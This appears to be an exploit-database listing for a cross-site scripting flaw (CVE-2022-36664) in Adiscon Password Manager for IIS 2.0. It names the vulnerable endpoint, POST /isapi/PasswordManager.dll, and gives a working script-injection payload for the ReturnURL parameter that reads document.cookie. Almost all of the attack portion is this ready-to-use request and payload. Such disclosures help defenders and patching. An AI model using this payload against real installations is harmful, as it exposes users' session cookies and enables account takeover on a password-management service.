Exploit for Password Manager For IIS 2.0 Cross Site Scripting Vulneraility CVE-2022-36664

Name: Exploit for Password Manager For IIS 2.0 Cross Site Scripting Vulneraility CVE-2022-36664
Rating: 5 (165 reviews)

2022-10-04 | CVSS 5.8

## https://sploitus.com/exploit?id=1337DAY-ID-38015
# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664

*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>

*Cordially,*